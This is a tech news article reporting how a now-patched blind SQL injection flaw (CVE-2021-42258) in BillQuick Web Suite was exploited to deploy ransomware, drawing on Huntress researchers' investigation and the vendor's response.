IT Pro is supported by its audience. When you purchase through links on our site, we may earn an affiliate commission. Learn more

BillQuick billing software exploit lets hackers deploy ransomware

The now-patched critical zero-day vulnerability also leaked sensitive data from the time and billing platform

Hackers are exploiting a flaw in the BillQuick Web Suite, a time and billing system from BQE Software, to deploy ransomware.

According to a blog post by security researchers at Huntress, cyber criminals were able to exploit CVE-2021-42258 to gain initial access to a US engineering company and deploy ransomware across the victim’s network.

BQE Software has a user base of 400,000 users worldwide. At the time of writing, it's not known who the hackers behind the exploit are.

According to Caleb Stewart, a security researcher for Huntress Labs, researchers were first made aware of the issue when several ransomware “canary files” were tripped within an engineering company’s environment that was managed by one of Huntress’s partners. These files were set up to trigger alerts if they’re changed, moved, or deleted.

Further investigations found Microsoft Defender antivirus alerts indicating malicious activity as the MSSQLSERVER$ service account. This, according to Stewart, indicated the possibility of a web application being exploited to gain initial access. 

“The server in question hosted BillQuick Web Suite 2020 (WS2020), and the connection logs indicated a foreign IP repeatedly sending POST requests to the web server logon endpoint, leading up to the initial compromise,” said Stewart.

The researchers suspected that a bad actor was attempting to exploit BillQuick, so then began a process of reverse engineering of the web application to trace the attacker’s steps. With a local copy of the app, researchers identified concatenated SQL queries.

“Essentially, this function allows a user to control the query that’s sent to the MSSQL database - which in this case, enables blind SQL injection via the application’s main login form,” said Stewart.

Researchers were then able to recreate the victim’s environment and validate simple security tools like sqlmap easily obtained sensitive data from the BillQuick server without authentication.

Related Resource

The best defence against ransomware

How ransomware is evolving and how to defend against it

Blue padlock Free download

“Because these versions of BillQuick used the sa (System Administrator) MSSQL user for database authentication, this SQL injection also allowed the use of the xp_cmdshell procedure to remotely execute code on the underlying Windows operating system,” said Stewart.

The firm has been in contact with BQE Software, which has since patched the flaw. It is still working with the company on “multipleother  security concerns”.

Despite BQE Software’s cooperation, Stewart said other well-established vendors are doing “very little to proactively secure their applications and subject their unwitting customers to significant liability when sensitive data is inevitably leaked and/or ransomed”.

“In 2021, it’s still extremely common for vendors to sweep cyber security issues under the rug; we have the impression that BQE is taking our feedback seriously,” he added.

Featured Resources

Four strategies for building a hybrid workplace that works

All indications are that the future of work is hybrid, if it's not here already

Free webinar

The digital marketer’s guide to contextual insights and trends

How to use contextual intelligence to uncover new insights and inform strategies

Free Download

Ransomware and Microsoft 365 for business

What you need to know about reducing ransomware risk

Free Download

Building a modern strategy for analytics and machine learning success

Turning into business value

Free Download

Recommended

Dell Technologies World 2022: Dell unveils fastest storage architecture in company history
Server & storage

Dell Technologies World 2022: Dell unveils fastest storage architecture in company history

4 May 2022
Dell Technologies World 2022: Dell unveils security offerings for major cloud providers
public cloud

Dell Technologies World 2022: Dell unveils security offerings for major cloud providers

3 May 2022
How do you become an ethical hacker?
ethical hacking

How do you become an ethical hacker?

29 Apr 2022
What is phishing?
phishing

What is phishing?

29 Apr 2022

Most Popular

Windows Server admins say latest Patch Tuesday broke authentication policies
Server & storage

Windows Server admins say latest Patch Tuesday broke authentication policies

12 May 2022
16 ways to speed up your laptop
Laptops

16 ways to speed up your laptop

13 May 2022
How full-stack observability can accelerate IT innovation
Sponsored

How full-stack observability can accelerate IT innovation

3 May 2022